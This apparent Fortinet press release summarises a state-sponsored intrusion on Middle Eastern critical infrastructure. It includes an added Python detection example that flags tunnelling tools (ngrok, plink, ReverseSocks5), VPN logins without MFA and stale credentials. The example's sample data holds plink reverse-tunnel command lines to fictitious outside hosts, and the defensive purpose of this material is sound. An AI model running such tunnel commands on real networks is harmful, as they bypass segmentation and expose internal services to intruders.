Dubai: The FortiGuard Labs’ Incident Response (FGIR) team recently investigated a long-term cyber intrusion targeting critical national infrastructure (CNI) in the Middle East.
The intrusion, attributed to a state-sponsored threat actor, involved sustained espionage operations and suspected network prepositioning. Over the course of nearly two years, the threat actor deployed novel malware, bypassed network segmentation, and made repeated attempts to maintain access across segmented IT and OT environments.
Advanced Malware and Persistent Access
The multi-phase intrusion detailed by FGIR spanned from 2023 to early 2025. The attacker initially gained entry using compromised VPN credentials, then established footholds using multiple custom backdoors including HanifNet, HXLibrary, and NeoExpressRAT. They bypassed segmentation using proxy tools such as Ngrok, ReverseSocks5, and plink, and targeted virtualization infrastructure to deepen access.
While no confirmed disruption to OT systems was observed, the report notes significant reconnaissance activity in restricted environments — emphasizing the need for heightened defense across converged IT/OT networks.
The operation unfolded across four stages: initial compromise, consolidation of access, adversary response to containment, and attempted re-entry via exploitation of third-party software and phishing attacks. Even after being removed from the network, the threat actor made repeated efforts to re-establish access — signalling a long-term strategic objective.
OT Security Faces Escalating Threats
According to Fortinet’s 2024 State of Operational Technology and Cybersecurity Report, 73% of OT organizations globally have now experienced cyber intrusions — up from 49% in 2023 — with targeted OT-only attacks also rising from 17% to 24%.
This trend mirrors the patterns observed in the latest investigation, where state-linked actors deployed advanced malware, evaded detection, and used phishing and software exploitation to re-establish access after remediation efforts. Reflecting this, responsibility for OT cybersecurity is increasingly shifting to the CISO, CIO, and COO, with 60% of organizations reporting executive-level oversight.
Regional Threat Activity on the Rise
Fortinet’s 2025 Global Threat Landscape Report also confirms that state-sponsored groups remain highly active, targeting government, technology, and education sectors. Interestingly, over 60% of hacktivist campaigns globally were linked to geopolitical causes. The Middle East also remains a high-risk region for cyber activity, with the EMEA region accounting for 26% of recorded global exploitation attempts.
Defensive Recommendations
To defend against such persistent and well-resourced adversaries, the FortiGuard team recommends that organizations prioritize the following defensive measures:
Enforcing multi-factor authentication (MFA) and regular credential rotation
Deploying zero-trust architecture and network segmentation
Implementing endpoint detection and response (EDR) and behavioural analytics
Conducting regular penetration testing and incident response readiness exercises
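The intrusion pattern described above (proxy and tunnelling tools such as Ngrok, ReverseSocks5 and plink used to bridge segmented networks, entry through compromised VPN credentials) maps directly onto the recommendations on EDR/behavioural analytics, MFA and credential rotation. The following is an added illustration of what such detection logic can look like; it is not FortiGuard or Fortinet code and is not drawn from the report. The event schema, field names, host names, user names, IP addresses (documentation ranges) and the 90-day rotation threshold are all constructed for this example.

```python
"""Hypothetical behavioural checks over constructed telemetry.

Added example, not Fortinet/FortiGuard code. It flags three patterns the
report discusses:
  1. Tunnelling/proxy tools (Ngrok, ReverseSocks5, plink) that can bypass
     network segmentation, detected by executable name or by plink-style
     reverse-forwarding arguments even when the binary has been renamed.
  2. VPN logins that succeeded without MFA.
  3. Accounts whose credential age exceeds a rotation policy.
All event formats and sample values below are constructed.
"""
from dataclasses import dataclass
from datetime import datetime, timezone

# Tool names taken from the report; lower-case executable stems.
TUNNEL_TOOLS = {"ngrok", "plink", "reversesocks5"}
# plink's real switches: -R sets up a remote (reverse) port forward,
# -N opens no shell. Both together on one command line is a tunnel,
# whatever the binary is called.
PLINK_REVERSE_ARGS = {"-R", "-N"}
MAX_CREDENTIAL_AGE_DAYS = 90  # constructed policy value


@dataclass
class Finding:
    rule: str
    subject: str  # host or account the finding concerns
    detail: str


def _exe_stem(image: str) -> str:
    """Lower-case file name without directory or extension (Windows or POSIX path)."""
    name = image.replace("\\", "/").rsplit("/", 1)[-1].lower()
    return name.rsplit(".", 1)[0] if "." in name else name


def detect_tunnel_tools(process_events):
    """Flag process-creation events that look like segmentation-bypass tunnels."""
    findings = []
    for ev in process_events:
        stem = _exe_stem(ev["image"])
        tokens = set(ev.get("cmdline", "").split())
        if stem in TUNNEL_TOOLS:
            findings.append(Finding("tunnel_tool", ev["host"], f"{stem}: {ev['cmdline']}"))
        elif PLINK_REVERSE_ARGS <= tokens:
            # Renamed binary, but the argument shape is a plink reverse tunnel.
            findings.append(Finding("reverse_tunnel_args", ev["host"], ev["cmdline"]))
    return findings


def detect_vpn_without_mfa(vpn_events):
    """Flag successful VPN authentications that completed without an MFA step."""
    return [
        Finding("vpn_no_mfa", ev["user"], f"from {ev['src_ip']}")
        for ev in vpn_events
        if ev["result"] == "success" and not ev["mfa"]
    ]


def detect_stale_credentials(accounts, now):
    """Flag accounts whose password is older than MAX_CREDENTIAL_AGE_DAYS."""
    findings = []
    for acct in accounts:
        last_set = datetime.fromisoformat(acct["password_last_set"])
        age = (now - last_set).days
        if age > MAX_CREDENTIAL_AGE_DAYS:
            findings.append(Finding("stale_credential", acct["user"], f"{age} days old"))
    return findings


# Constructed sample telemetry (hosts, users and IPs are fictitious).
PROCESS_EVENTS = [
    {"host": "ws-eng-04", "image": r"C:\Users\j.doe\AppData\Local\Temp\plink.exe",
     "cmdline": "plink.exe -ssh -N -R 3389:127.0.0.1:3389 user@203.0.113.5"},
    {"host": "srv-jump-01", "image": r"C:\Windows\System32\svchost.exe",
     "cmdline": "svchost.exe -k netsvcs"},
    {"host": "ws-eng-09", "image": r"C:\ProgramData\update\svc.exe",
     "cmdline": "svc.exe -ssh -N -R 8443:10.20.0.15:443 ops@198.51.100.7"},
    {"host": "ws-fin-02", "image": "/usr/local/bin/ngrok", "cmdline": "ngrok tcp 22"},
]
VPN_EVENTS = [
    {"user": "j.doe", "src_ip": "198.51.100.23", "mfa": True, "result": "success"},
    {"user": "svc_backup", "src_ip": "203.0.113.77", "mfa": False, "result": "success"},
    {"user": "a.khan", "src_ip": "203.0.113.80", "mfa": False, "result": "failure"},
]
ACCOUNTS = [
    {"user": "j.doe", "password_last_set": "2025-01-15T00:00:00+00:00"},
    {"user": "svc_backup", "password_last_set": "2023-06-01T00:00:00+00:00"},
    {"user": "a.khan", "password_last_set": "2024-11-20T00:00:00+00:00"},
]
NOW = datetime(2025, 3, 1, tzinfo=timezone.utc)


def run_all():
    """Run every check over the constructed samples and return findings by rule."""
    findings = (detect_tunnel_tools(PROCESS_EVENTS)
                + detect_vpn_without_mfa(VPN_EVENTS)
                + detect_stale_credentials(ACCOUNTS, NOW))
    by_rule = {}
    for f in findings:
        by_rule.setdefault(f.rule, []).append(f)
    return by_rule


if __name__ == "__main__":
    for rule, items in run_all().items():
        for f in items:
            print(f"[{rule}] {f.subject}: {f.detail}")
```

The renamed-binary check is the part worth noting: name-based blocklists miss a tool that has been copied to a new file name, whereas the argument shape of a reverse tunnel does not change, which is the kind of behavioural signal the EDR recommendation points at. In a real deployment the constructed lists would be replaced by a feed from the endpoint agent, VPN concentrator and directory, and the stale-credential check would run on a schedule rather than once.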
This investigation highlights the persistent and evolving nature of state-backed cyber threats targeting Middle Eastern CNI, and underscores the growing need for continuous monitoring, adaptive defense strategies, and coordinated threat intelligence to protect critical infrastructure against sophisticated adversaries.
About Fortinet
Fortinet (Nasdaq: FTNT) is a driving force in the evolution of cybersecurity and the convergence of networking and security.
Our mission is to secure people, devices, and data everywhere, and today we deliver cybersecurity everywhere our customers need it with the largest integrated portfolio of over 50 enterprise-grade products. Well over half a million customers trust Fortinet's solutions, which are among the most deployed, most patented, and most validated in the industry.
The Fortinet Training Institute, one of the largest and broadest training programs in the industry, is dedicated to making cybersecurity training and new career opportunities available to everyone. Collaboration with esteemed organizations from both the public and private sectors, including Computer Emergency Response Teams (“CERTS”), government entities, and academia, is a fundamental aspect of Fortinet’s commitment to enhance cyber resilience globally.
FortiGuard Labs, Fortinet’s elite threat intelligence and research organization, develops and utilizes leading-edge machine learning and AI technologies to provide customers with timely and consistently top-rated protection and actionable threat intelligence.
Learn more at https://www.fortinet.com